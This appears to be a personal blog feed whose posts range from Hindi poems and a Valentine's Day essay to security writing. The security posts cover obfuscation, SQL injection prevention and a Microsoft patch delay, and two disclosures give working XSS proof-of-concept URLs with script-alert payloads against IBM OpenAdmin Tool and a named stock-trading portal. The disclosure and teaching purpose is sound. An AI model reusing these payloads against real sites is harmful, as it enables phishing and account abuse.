tag:blogger.com,1999:blog-31023687410323580012024-02-18T18:53:00.213-08:00voidrootSumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.comBlogger29125tag:blogger.com,1999:blog-3102368741032358001.post-48595360130102286572013-02-14T03:17:00.001-08:002013-02-14T03:17:46.282-08:00Valentine Day: Not about love its all about Courage<p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-eDyBa_bHUNVmjnirbigD06bwD3zQvG_ny1HPj0ZblZGltmhnFKh2N921NHYLsTZyreVkEYJTE8ZLvZxyB73MbSGOAQ9azyMwuwXkhwtPmRpX41waZebUelv4AJn9-h1F6eQwEd983Bo/s1600-h/valentine%25255B4%25255D.jpg"><img style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="valentine" border="0" alt="valentine" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKEwNRnsPyOq3CCj57N0bLOwhgSz2SMTjnq9I2SwNrJ0IbZWMN3mpzH8DY5iwAzcWQLxTUEhT3LlsTGXztEj7d-P6erekpLeztUr6xsG6QD1t46It25eASpZ2fZzm9uZeY0RBhB8KyKSY/?imgmax=800" width="45" height="66"></a>I never understand why Valentine day has been associated with love while act of saint Valentine was courageous & charismatic (once in his life time). To proof my point i search in historical document and found following points </p> <p><strong><font size="3">Courage of Saint valentine:</font></strong> “Saint Valentine was imprisoned for performing weddings for soldiers who were forbidden to marry and for ministering to Christians”. To go against the Rome emperor needs courage. what happen to those soldiers after marriage is unknown perhaps they have been punished or may be absconded from Rome but Priest paid the price . Note its not about Helping Couples who were in love but to help people to start there families ( Love don’t need marriage to be proved). </p> <p><strong><font size="3">Charisma of Saint valentine:</font></strong> “He is said to have healed the daughter of his jailer Asterius when he was imprisoned”. Legend states that before his execution he wrote "from your Valentine" ( this is the form of expression every one write it with in letters) as a farewell to her. I don't see any romantic love between these two as there ages are not known and a healer always get lot of respect from the persons.</p> <p><img style="border-bottom-style: none; border-left-style: none; border-top-style: none; border-right-style: none" class="wlEmoticon wlEmoticon-redheart" alt="Red heart" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxhZHIjEIP6XMprqq-IMqZUEZ15m-Z744iDPshXTbdFr6wcoYFDIT0fQee2QgowBKqf-O_38LC_HiYafCJmxSAA7_4F50km8O4I57tfIRhbPRQT5irDwISVT3CjClJABQEz5q_fejUcp4/?imgmax=800"><strong><font size="3">Heart symbol for Valentine:</font></strong> I become curious how the Heart comes in picture and voila! found the answer as Saint Valentine is said to have cut hearts from parchment, giving them to the soldiers ( note not to the girl or couple it’s soldiers may be as symbol of his blessings)</p> <p><strong><font size="3"><img style="border-bottom-style: none; border-left-style: none; border-top-style: none; border-right-style: none" class="wlEmoticon wlEmoticon-redrose" alt="Red rose" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdg7kfsBuxjXE644Gb7I7Wq4-w0K5cbzT-vTbt88HS76ijTTfPfwRWJNMLljEoTTDG3nB3lZ21vMcLqVngfxO83J8DWMC9aNbczXgIxBPZQCaVV6GLigX_0Qf9tVA2GCAnS3clRMvjzlg/?imgmax=800">What about 14th Feb: </font></strong>Saint Valentine was buried on the Via Flaminia on February 14. In Ancient Rome, Lupercalia, observed February 13–15, was an archaic rite connected to fertility. Lupercalia was a festival local to the city of Rome. The more general Festival of Juno Februa, meaning "Juno the purifier "or "the chaste Juno", was celebrated on February 13–14.</p> <p>Note: The celebration of Saint Valentine did not have any romantic connotations until Chaucer's poetry about "Valentines" in the 14th century.</p> <p><strong><font size="3">Valentine's letters:</font></strong> In Middle Ages, men drawing the names of girls at random to couple with them and around 1600, this has been replaced with a religious custom of girls drawing the names of apostles from the altar.</p> <p><strong><font size="3">So why Valentines day Became so famous:</font></strong> That’s very difficult to answers but seems it has been famous by the Poet Chaucer's by following poem “Parlement of Foules” (it has almost 700 lines)</p> <p><i>For this was on seynt Volantynys day</i><br><i>Whan euery bryd comyth there to chese his make</i>.</p> <p><font color="#00ff00">["For this was on Saint Valentine's Day, when every bird cometh there to choose his mate."] </font> <p>But here is the catch This poem was written to honor the first anniversary of the engagement of King Richard II of England to Anne of Bohemia.A treaty providing for a marriage was signed on May 2, 1381 and mid-February is an unlikely time for birds to be mating in England. <p><strong><font size="3">So what one should do:</font></strong> Ok i gave up now history is very confusing and we celebrate many ritual for wrong reasons also. We need special day for every thing due to social,Economy & marketing reasons and if some Famous/powerful persons declare a day special people start believing in. so we have a day dedicated for Love if you believe in it Celebrate it if you don't then enjoy the life & dedicate any other day ( may be every day) for your dear and love once . – Enjoy <p> <p><font color="#00ff00"><i>Hayle Bishop Valentine whose day this is</i><br><i>All the Ayre is thy Diocese</i><br><i>And all the chirping Queristers</i><br><i>And other birds ar thy parishioners</i><br><i>Thou marryest every yeare</i><br><i>The Lyrick Lark, and the graue whispering Doue,</i><br><i>The Sparrow that neglects his life for loue,</i><br><i>The houshold bird with the redd stomacher</i><br><i>Thou makst the Blackbird speede as soone,</i><br><i>As doth the Goldfinch, or the Halcyon</i><br><i>The Husband Cock lookes out and soone is spedd</i><br><i>And meets his wife, which brings her feather-bed.</i><br><i>This day more cheerfully than ever shine</i><br><i>This day which might inflame thy selfe old Valentine.</i></font> <p><font color="#00ff00"><i>—John Donne, </i><cite>Epithalamion Vpon Frederick Count Palatine and the Lady Elizabeth marryed on St. Valentines day</cite></font> <p><cite></cite> <p><cite></cite> <p><cite>Reference : Various sources on internet specially Wikipedia</cite> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-89931466362754729412013-01-03T01:43:00.001-08:002013-01-03T22:22:25.609-08:00Pathar ka hraday (heart of stone)<p>Parhar ka hraday liye baitha hoon.<br>Apne hi sayon se ghire baitha hoon.<br>Na doodhna na janne ki koshish karna<br>Kaisa hoon kahan hoon kya piye baitha hoon.<br>Pathar ka .................... <p>poochne ka haq nahi deta kisko na aitbar karta hoon<br>kyon kia kaise kia, kya kiye baitha hoon.<br>kuch na samjhao, kuch na batlao, sab janta hoon<br>na samajh hoon, sab kuch samajh ke baitha hoon</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-24843571169843901042012-12-26T07:54:00.001-08:002012-12-26T07:54:36.101-08:00Mulakat nahi karta<p>Shikayat hai ke vo mulakat nahi karta</p> <p>Muskurata hai magar bat nahi karta</p> <p>Shabdo ko rakhat hai motyon ki tarah</p> <p>kanjoos hai kabhi istemal nahi karta</p> <p> </p> <p>manta nahi kahna mera bas yunhin</p> <p>Apne main magan hai kuch khayal nahi karta</p> <p>har sur ko janta hai pahchanta hai har kala ko</p> <p>phir bhi adhura sa hai koi pura kam nahi karta</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-21577686839369075532012-10-06T01:41:00.001-07:002012-10-06T02:38:59.515-07:00Obfuscation methods<p align="left"></p> <p>While i was scrolling my old mails in search of some financial document i found one interesting doc on which i was working long time back and due to some unknown reason didn't able to continue it. Here i am posting that unfinished work. I will try to cover topics in detail in future .</p> <p> </p> <p><strong><u>Obfuscation</u></strong></p> <p>To totally obscure with non-germane information in a verbose manner, with the intent to provide a non-answer, and provide total befuddlement. <p>“Any hacker worth his salt is an artist in obfuscation”. <p>In network security, obfuscation refers to methods used to obscure an attack payload from inspection by network protection systems. <p><b><u>Encryption</u></b> <b><u>vs Obsfucation</u></b></p> <p>Obfuscation <br>Obfuscation, in general, describes a practice that is used to intentionally make something more difficult to understand. In a programming context, it means to make code harder to understand or read, generally for privacy or security purposes. A tool called an obfuscator is sometimes used to convert a straight-forward program into one that works the same way but is much harder to understand. <p>Encryption <p>The manipulation of data to prevent accurate interpretation by all but those for whom the data is intended. Financial institutions use encryption to increase the security of data transmitted via the Internet. <p><strong><u>Method of obfuscation</u></strong></p> <p><b><u></u></b> <p><font color="#4bacc6">Recreational Obfuscation </font> <p>There are many varieties of interesting obfuscations ranging from simple keyword substitution, use/non-use of whitespace to create artistic effects. <p><font color="#4bacc6">Obfuscation by code morphing </font> <p>This is achieved by completely replacing a section of the compiled code with an entirely new block that expects the same machine state when it begins execution as the previous section, and will leave with the same machine state after execution as the original. However, a number of additional operations will be completed as well as some operations with an equivalent effect. <p><font color="#4bacc6">Obfuscation in malicious software </font> <p>Spammers frequently use obfuscated JavaScript or HTML code in spam messages. The obfuscated message, when displayed by an HTML-capable e-mail client, appears as a reasonably normal message—albeit with obnoxious JavaScript behaviors such as spawning pop-up windows. However, when the source is viewed, the obfuscations make it far more difficult for investigators to discern where the links go, or what the JavaScript code does. <p><font color="#4bacc6">Trail obfuscation </font> <p>The purpose of trail obfuscation is to confuse, disorientate and divert the forensic examination process. Trail obfuscation covers a variety of techniques and tools that include “log cleaners, spoofing, misinformation, backbone hoping, zombied accounts, trojan command”. <p>Advantages of obfuscation</p> <p><a name="Intellectual_property_protection"></a> <p><font color="#4bacc6">Intellectual property protection </font> <p><a name="Reduced_security_exposure"></a><font color="#4bacc6">Reduced security exposure </font> <p><font color="#4bacc6">Size reduction </font> <p><a name="Library_linking"><font color="#4bacc6"></font></a> <p><font color="#4bacc6">Library linking</font> <p><u><strong>Disadvantages of obfuscation</strong></u></p> <p><font color="#4bacc6">When used alone </font> <p>At best, obfuscation merely makes it time-consuming, but not impossible, to reverse engineer a <p>program. When security is important, measures other than obfuscation should be used. <p><font color="#4bacc6">Debugging </font> <p>Obfuscated code is extremely difficult to debug. Variable names will no longer make sense, and the structure of the code itself will likely be modified beyond recognition. This fact generally forces developers to maintain two builds: <p><font color="#4bacc6">Portability</font> <p>Obfuscated code often depends on the particular characteristics of the platform and compiler, making it difficult to manage if either change <p><font color="#4bacc6">Obfuscation for Evasion </font> <p>Protection provided by Security devices can be bypassed by obfuscating the exploit/shellcode . Some of the known methods are: <p>Encoding <p>Directory traversing <p>Null characters <p>Spaces</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-51335995631507373222012-09-19T07:59:00.001-07:002016-01-06T03:33:03.298-08:00Writing Security Story<p>Security Story is an artifact that anyone (developer, manager, business owner, user, etc ) can read and feel assured that their security concerns are addressed.It is a collaborative effort that highlights how the implementation, application design, service infrastructure, organization processes, and the business environment itself protect what’s important to the business.</p> <p>There is no fixed format or content for a security story as a security story should evolve over the life of an application. A story may contain text, images, diagrams, spreadsheets, links, and other formats.</p> <p>security story can be write in many ways most commonly it can start with capturing the concerns of application stakeholders, including both application providers and application users followed by list down the lifelines of the application.You need to create strategy to defend the each lifeline.Build the specific defence and proof of these defenses should be included in story. security stories are not static they has to change when condition changes . </p> <p> </p> <p>Reference: http://www.ruggedsoftware.org/</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-86340084208530309802012-09-18T07:14:00.001-07:002012-09-19T08:02:16.557-07:00What It Takes To Be Rugged.<p>Recently one of my friend ask if there is any good reference to to incorporate security testing with agile development. Unfortunately we didn't able to find any such reference.Although Rugged approach look promising and also claim to support agile way of security testing of application. The ultimate goal of including Security testing in SDLC is to produce secure code.</p> <p>Rugged approach doesn't focus only finding vulnerabilities but try to improve overall capability of an organization to develop secure Code. To achieve this goal organization must establish process to monitor upcoming threats. there should be a communication path so everyone can share all the security-relevant information about the application . A standard mechanism of defence should be use across the organization . Don't trust third party component used in your product, establish guidelines for each component that details the secure use of that library. Build applications that will be largely resistant to the threats of the future for example using strong input validation, in-application attack detection and safe interpreter use can eliminate many flaws forever. Defences should be continuously verified and monitored all the way through development and into production. Being Rugged means that you constantly patch and refactor your software development organization to eliminate the organizational bugs that are causing insecure code.</p> <p> </p> <p>Reference: http://www.ruggedsoftware.org/</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-12260242981469244452012-09-03T08:51:00.001-07:002012-09-03T08:51:59.967-07:00The Rugged Software Manifesto<ul> <li>I am rugged and, more importantly, my code is rugged. <li>I recognize that software has become a foundation of our modern world. <li>I recognize the awesome responsibility that comes with this foundational role. <li>I recognize that my code will be used in ways I cannot anticipate, in ways it was not designed, and for longer than it was ever intended. <li>I recognize that my code will be attacked by talented and persistent adversaries who threaten our physical, economic, and national security. <li>I recognize these things - and I choose to be rugged. <li>I am rugged because I refuse to be a source of vulnerability or weakness. <li>I am rugged because I assure my code will support its mission. <li>I am rugged because my code can face these challenges and persist in spite of them. <li>I am rugged, not because it is easy, but because it is necessary and I am up for the challenge.</li></ul> <p> </p> <p>Reference: <a href="http://www.ruggedsoftware.org/">http://www.ruggedsoftware.org/</a></p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-402238551490676372012-08-30T08:42:00.001-07:002012-08-30T08:42:48.204-07:00Impacting Adversary ROI<p>Recently i was looking talks on RSA 2012. One talk which got my attention is Adversary ROI: Why Spend $40B Developing It, When You Can Steal It for $1 M. Two points i liked most are</p> <p>1. The Adversary Doesn’t Care About Your ROI/ROSI.</p> <p>2. Whatever security measures you put should reduced the the Adversary ROI .</p> <p>Lets see the formula of adversary ROI</p> <p> </p> <p><strong>Adversary ROI</strong>= ((( Attack value (Value of Assets Compromised + Adversary Value of Operational Impact) - Cost of the Attack) x Probability of Success )/Cost of the Attack)-Deterrence Measures (% Chance of Getting Caught x Cost of Getting Caught)</p> <p> </p> <p>Most important factor of this ROI is the cost of the attack if your security measures can increase the <strong>cost of attack</strong> ( which most of the measures do) it will reduce the adversary ROI by multi fold this the area where most of the security vendors focused there effort along with reducing the probability of the success. Advancement of attack tools and techniques reducing the attack cost and increasing the probability of success white hackers/Defenders caught themselves in a rat race to build the countermeasures. As best practice multilayer security (IPS/IDS/Firewall/antimalware)has to be implement to affect these vectors of adversary ROI.</p> <p>Let say after applying all the measures attacker still able to penetrate your system but if you can be alarmed and act (here your various monitoring system play a great role for example File/Registry/Process Integrity monitoring system, Log Inspection system etc. ) before adversary able to steal/damage your assets this will reduce the <strong>probability of success</strong> .</p> <p>What if your assets has been stolen/damaged before you able to act still there is hope in the form of your risk management policy and forensics that can help in recovery and catching your adversary. These two factor increase the <strong>chance of catching the hacker</strong>.</p> <p>Now there is one factor which you cannot control directly is the <strong>impact of getting caught </strong>it’s lot depend of the government/country rules and regulation how they treat your adversary.</p> <p>while you can reduce the <strong>value of assets compromised</strong> it’s not always possible and not advisable too but you cannot control the <strong>Adversary Value of Operational Impact</strong> as it’s depends on type of adversary you are dealing with.</p> <p>one this should be note here factor affecting adversary ROI should be considered in totality not in isolation.</p> <p> </p> <p>Reference.</p> <p><a href="http://365.rsaconference.com/servlet/JiveServlet/previewBody/3429-102-1-4545/GRC-202.pdf">http://365.rsaconference.com/servlet/JiveServlet/previewBody/3429-102-1-4545/GRC-202.pdf</a></p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-65373968181087465892012-08-30T07:36:00.001-07:002012-09-02T11:30:30.515-07:00Security Related Quotes<p> </p> <ul> <li>A risk requires a threat and a vulnerability that results in a negative consequence. <li>A Threat is an Actor with a Capability and a Motive. <ul><!--EndFragment--></ul> <li>Casual Attacker power grows at the rate of Metasploit. <li>PCI won’t stop a <em>determined attacker</em>, but it will at least stop a <em>casual attacker.</em> <li>PCI is better than <em>nothing</em> – it at least raises the bar. <li>The organization doesn’t often profit from security investments. <li>Attack surface is approaching infinity (which is not a real number). <li>Risk Mitigated can be both subjective and objective. <li>The Adversary Doesn’t Care About Your ROI/ROSI. <li>The problem is that security is so complex that every topic has a huge amount of context associated with. <li>Don’t let your project’s definition of security be driven by the signatures in a tool, external compliance requirements, or what happens to be in a particular penetration tester’s or developer’s head. <li>There are simply far too many ways to write insecure code. <li>We don’t need to fix those vulns; we have a WAF- ROFL</li></ul> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-70135373458174735172012-08-21T06:06:00.001-07:002012-08-21T06:08:28.589-07:00Test Process Improvement manifesto<p><strong>Flexibility</strong> over Detailed Processes <p><strong>Best Practices</strong> over Templates <p><strong>Deployment orientation</strong> over Process orientation <p><strong>Reviews</strong> over Quality Assurance (departments) <p><strong>Business driven</strong> over Model driven</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-32566325276437714232012-08-13T07:47:00.001-07:002012-08-13T07:47:13.523-07:00Manifesto for Agile Software Development<h3> </h3> <p>We are uncovering better ways of developing software by doing it and helping others do it. Through this work we have come to value: <dl> <dd><b>Individuals and interactions</b> over processes and tools <dd><b>Working software</b> over comprehensive documentation <dd><b>Customer collaboration</b> over contract negotiation <dd><b>Responding to change</b> over following a plan</dd></dl>That is, while there is value in the items on the right, we value the items on the left more. Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-58059324490687512772012-07-21T07:03:00.001-07:002012-07-21T07:22:06.296-07:00Parameterized Queries: Fix the Sql injection at root.<p>Sql Injection Is the most common vulnerability found in Web applications. whenever i talk about it’s prevention most common answer comes as input validation which is most cost effective and can be implemented without changing the code (using some third party product like WAF,IPS/IDS,Proxies) or without changing the sql statements by implementing such functions' in web application itself. But this is trivial to bypass ( we are living in the world where of hell lot of character encoding are supported) and many time lead to broken applications. <p>In this article i will try to explore the fixing the problem in it’s root . Modern application has been build using multi-tier architectures and most common architecture is 3-Tier Architecture. <p><strong>3-Tier Architecture</strong><strong>:</strong><strong> </strong>This involves three layers Client layer, Server layer and business logic tier, service tier or middle tier (layer). In the client-server solution the client was handling the business logic that makes the client “thick”. A thick client means that it requires heavy traffic with the server, thus making it difficult to use over slower network connections like Internet and Wireless . <p>In 3-tier Architecture, the client is only handling presentation logic. This means that only little communication is needed between the client and the middle tier making the client “thin” . So a typical view would be <b>Client tier <---> Middle tier<---> Database Tier</b> <p>Many Developer believe that following Secure coding practice for middle tier only will prevent SQL injection which is not always true that we will see in short while. <p>not let’s have a look of a typical sql injection flaw <p><strong>Dynamic Queries:</strong> The following (Java) example is would allow an attacker to inject code into the query that would be executed by the database. The unvalidated “userName” parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common. this is also know as Dynamic Queries. <p>String query = "SELECT EmployeeId FROM Employee WHERE Emp_name = " + request.getParameter("userName"); <br>Statement stmt = connection.createStatement(); <br>ResultSet results = stmt.executeQuery( query ); <p>In sql Community to make an sql statement Sql injection proof use of Parameterized Queries is highly recommended. <p><b>Parameterized Queries: </b>They are are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied. <p>Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.For example, if an attacker were to enter the userName of blah' or '1'='1, the parameterized query would not be vulnerable and would instead look for a Emp_name which literally matched the entire string blah' or '1'='1. <p>String username = request.getParameter("userName"); <br>String query = "SELECT EmployeeId FROM Employee WHERE Emp_name = ? "; <br>PreparedStatement pstmt = connection.prepareStatement( query ); <br>pstmt.setString( 1, username); <br>ResultSet results = pstmt.executeQuery( ); <p>Another benefit of using Parameterized Queries is to get performance enhancements for details Pleas check http://www.simple-talk.com/sql/t-sql-programming/performance-implications-of-parameterized-queries/ <p>Another method that can be use to make your database access Sql Injection proof is to use Stored procedures . <p><b>Stored procedures: </b>They have the same effect as the use of prepared statements when implemented safely i.e Stored procedures must not use any dynamic Sql statements. It require the developer to define the SQL code first, and then pass in the parameters after. The difference between prepared statements and stored procedures is that the sql code for a stored procedure is defined and stored in the database itself, and then called from the application. Using this technique requires great interaction between database developer and middle tier developers. <p>String username = request.getParameter("username");<br>CallableStatement cstmt = connection.prepareCall("{call getEmpId(?)}");<br>cstmt.setString(1, username);<br>ResultSet results = cstmt.executeQuery(); <p><strong>References:</strong> <br>https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet <br>http://blog.simcrest.com/what-is-3-tier-architecture-and-why-do-you-need-it/ <br>https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet <br>http://www.simple-talk.com/sql/t-sql-programming/performance-implications-of-parameterized-queries/ Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-42973110865131365582012-07-13T10:53:00.000-07:002012-07-13T11:09:31.807-07:00SharePoint left naked for one month by HTML Sanitization Vulnerability - CVE-2012-1858<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
<div class="MsoNormal">
<br /></div>
</div>
<div class="MsoNormal">
On 10th july MS released a security patch to Fix the
Vulnerability in toStaticHTML API . This API is found in Internet Explorer 8,9, SharePoint and Lync. It is used to sanitize HTML fragments from
dynamic and potentially malicious content.<o:p></o:p></div>
<div class="MsoNormal">
If an attacker is able to
break the filtering mechanism and pass malicious code through this function,
he/she may be able to perform HTML injection based attacks (i.e. XSS).<o:p></o:p></div>
<div class="MsoNormal">
Microsoft has issued several updates to address this
vulnerability.<o:p></o:p></div>
<div class="MsoNormal">
MS12-037 - <a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-037"><span style="color: windowtext; text-decoration: none;">http://technet.microsoft.com/en-us/security/bulletin/ms12-037</span></a> Published: Tuesday, June 12, 2012<o:p></o:p></div>
<div class="MsoNormal">
MS12-039 - <a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-039"><span style="color: windowtext; text-decoration: none;">http://technet.microsoft.com/en-us/security/bulletin/ms12-039</span></a>
Published: Tuesday, June 12, 2012<o:p></o:p></div>
<div class="MsoNormal">
Note here after one month MS released one more update for
same Vulnerability.<o:p></o:p></div>
<div class="MsoNormal">
MS12-050 - <a href="http://technet.microsoft.com/en-us/security/bulletin/MS12-050"><span style="color: windowtext; text-decoration: none;">http://technet.microsoft.com/en-us/security/bulletin/MS12-050</span></a>
Published: Tuesday, July 10, 2012<o:p></o:p></div>
<div class="MsoNormal">
Now it’s very interesting that MS has Released it’s FIX for
IE & Lync on June 12 and for SharePoint it released it’s fix on July 10. So whoever has the knowledge that
this particular API is used in SharePoint also they had the full 1 month to
create the exploit and had a big window to Exploit this vulnerability on SharePoint.<o:p></o:p></div>
<div class="MsoNormal">
Wondering what makes the MS to do that .Isn't that was a zero day for SharePoint??<o:p></o:p></div>
</div>Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-46030806635895797192011-08-19T09:02:00.001-07:002011-08-19T09:02:15.933-07:00XSS in IBM Open Admin Tool<p> <blockquote> <p> “XSS in IBM Open Admin Tool (OAT_2.27_install_windows.exe)”</p></blockquote> <p>Product version : OAT v2.27 <p>Vendore has been informed : July 27, 2010 <p>They fix the vulnerability on : March 2011 <p>Fixed version: OAT v2.72 <p>Product Link: <a href="https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=swg-informixfpd&lang=en_US&S_PKG=dl&cp=UTF-8">https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=swg-informixfpd&lang=en_US&S_PKG=dl&cp=UTF-8</a> <p>Tested on windows XP <p>Open Admin tool For IDS Cross Site Scripting Vulnerability <p>OpenAdmin Tool is a PHP-based Web browser administration tool for managing one or more Informix Dynamic Servers. The OpenAdmin Tool for IDS provides the ability to monitor and administer multiple database IDS server instances from a single location. <p>There is a XSS vulnerability exist in its index page for parameter named informixserver , host & port. <p>POC: <p><a href="http://server:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver=<script>alert("server")</script>&host=<script>alert("host")</script>&port=<script>alert("port")</script>&username=<script>alert("username")</script>&userpass=<script>alert("userpass")</script>&idsprotocol=onsoctcp&conn_num">http://server:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver=<script>alert("server")</script>&host=<script>alert("host")</script>&port=<script>alert("port")</script>&username=<script>alert("username")</script>&userpass=<script>alert("userpass")</script>&idsprotocol=onsoctcp&conn_num</a> <p> <p>Regards <p>Sumit Kumar Soni <p><a href="mailto:ssummit@gmail.com">ssummit@gmail.com</a></p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-36942318260606400832011-07-20T08:20:00.001-07:002011-07-20T08:27:37.911-07:00Multiple XSS Vulnerabilities in Sharekhan trading Portal ( https://strade.sharekhan.com )<p> </p> <p> </p> <p><b>Vulnerability Description: </b> </p><p>Sharekhan(Indian Stock Trading Portal) provides it’s user to trade in stock market & Manage their DP account also. Being in finance domain it should be secure & vulnerability free but it’s online portal “<a href="https://strade.sharekhan.com/">https://strade.sharekhan.com/</a>” contains multiple XSS ( Cross site scripting) vulnerabilities those can be used against the site users for fishing & information gathering & can be turned to their financial losses . I have tried to contact the sharekhan but didn’t got any positive response yet. So I am reported these vulnerabilities to the <a href="http://cert.in/">cert.in</a> for further action & co-ordination with sharekhan site administrator. </p><p>These are fairly simple to discover & exploit. </p><p><b>Type of vulnerability : </b>Input validation ( XSS) </p><p><b>Product:</b> Sharekhan trading Portal </p><p>POC : </p><p>(User login Required ) </p><p><a href="https://strade.sharekhan.com/rmmweb/adminpcs.sk?verify=">https://strade.sharekhan.com/rmmweb/adminpcs.sk?verify=</a><script>alert("sharekhan pwnd2!")</script>&cid=e69da5e2d0abdf87cd1315e04a85e8f84041f9a23e279914e9dc6d274f45bd1d&sid=07b5b5b79ae54d622c869d61eea3a1add607426665b97512 </p><p><a href="http://lh6.ggpht.com/-dGew-895GZw/TibyKWs-f3I/AAAAAAAACaM/uGG_QrYnsmQ/s1600-h/image%25255B2%25255D.png"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" alt="image" src="http://lh4.ggpht.com/-xMkmJH2Pn8s/TibyLBQVCTI/AAAAAAAACaQ/Ss-gKO88iMI/image_thumb.png?imgmax=800" border="0" height="101" width="230" /></a> </p><p>(User login is not required) </p><p><a href="https://strade.sharekhan.com/rmmweb/AdminLoginServlet.sk?error=Your+Session+%3Cscript%3Ealert%28%22sharekhan">https://strade.sharekhan.com/rmmweb/AdminLoginServlet.sk?error=Your+Session+%3Cscript%3Ealert%28%22sharekhan</a> pwnd2!%22%29%3C/script%3Esoniji+expired%2C+please+login&caller=https%253A%252F%<a href="http://252fstrade.sharekhan.com/">252Fstrade.sharekhan.com</a>%252Frmmweb%252Fadminpcs.sk%253F </p><p><a href="http://lh3.ggpht.com/-zc09c1mKZmU/TibyL6SNmMI/AAAAAAAACaU/Wbd7ITGykCw/s1600-h/image%25255B5%25255D.png"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" alt="image" src="http://lh3.ggpht.com/-Vj0HCWLrzKQ/TibyMgiWr4I/AAAAAAAACaY/WHbQy5NlEdc/image_thumb%25255B1%25255D.png?imgmax=800" border="0" height="100" width="230" /></a></p>Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-48068796134956263292010-12-19T21:44:00.001-08:002010-12-19T21:44:46.451-08:00Open popups in new windows in firefox<p>Did you ever face problems with popups when you wish them to open in new tab instead in a new windows. it simple in your firefox type about:config and change value of <br><b>browser.link.open_newwindow.restriction</b> parameter to <b>0</b> . your problem will be solve.</p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-54979304886787955262010-12-10T09:46:00.001-08:002010-12-10T09:46:14.821-08:00MSN Still Missing Twitter<p> </p> <p>I Installed latest Windows Live Messenger 2011 great improvement from its ancestors. It is faster & pretty cool theme based GUI. the biggest makeover/usp of this new toy is its ability to seamless integration with various social network like </p> <p><a href="http://lh3.ggpht.com/_KqURyIY5WSM/TQJnXXjLu5I/AAAAAAAACYs/Y37Nmk8uWUY/s1600-h/msnservices%5B2%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="msnservices" border="0" alt="msnservices" src="http://lh3.ggpht.com/_KqURyIY5WSM/TQJnX8RZQyI/AAAAAAAACYw/2opAEuEm-yg/msnservices_thumb.jpg?imgmax=800" width="244" height="113"></a></p> <p>facebook, linkdin etc. </p> <p>Although Some article claim that it also integrate twitter that turn out to be false that’s the only gem that is missing from msn . I am looking forward to Microsoft to provide twitter integration also so I won’t require to use my browser or third party plugin to stay on twitter also . </p> <p><a href="http://lh4.ggpht.com/_KqURyIY5WSM/TQJnYqhTJhI/AAAAAAAACY0/k6G0k7woqtg/s1600-h/msnservicetwitter%5B2%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="msnservicetwitter" border="0" alt="msnservicetwitter" src="http://lh5.ggpht.com/_KqURyIY5WSM/TQJnZS0N4YI/AAAAAAAACY4/T7_n8H7UBDc/msnservicetwitter_thumb.jpg?imgmax=800" width="244" height="108"></a></p> 